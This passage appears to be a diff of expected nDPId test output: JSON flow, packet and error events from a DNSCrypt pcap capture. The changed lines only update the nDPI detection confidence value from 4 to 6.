AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciBsgAL0RNMUKAAABjgTMb4EvAbsGBA3nAg4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":133,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305219} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":133,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiBwAub0RWZcKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":134,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305219} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":134,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiBsAub0RWZgKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAIciB1AAL0RGIMKAAABjgTMb6nxAbsCCB1KAg8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":43505,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAIciB5AAL0RGIIKAAABjgTMb8w8AbsCCB1KAg0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciB8gAL0RNMEKAAABjgTMb7cIAbsGBNgLAhABAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":138,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305219} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiB8Aub0RWZQKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":946739305220,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739305220,"pkt":"ZmZmZmZmRERERERECABFAADQ+LhAADgRZ23DHl4cCgAAASD70jMAvJuWMsmAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAANu1cuNn82W5kyvuIYj3yDd11LkL534iAFDK9fBQA07jnu8CUEQwYJt1XxEE91D0YyFd2wLooVHv9yyAcc0SAAB5FL6yNLYbucmv1fHy4RsAcOv\/0XhGDt+qQ0bl\/YNRIXkUvrI0thu5ATQ9Gl8jB9hnnVXw"} @@ -296,28 +296,28 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":946739305326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305326,"pkt":"ZmZmZmZmRERERERECABFAADWg1AAADQR55aOBMxvCgAAAQG7gS8AwlgaAg6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 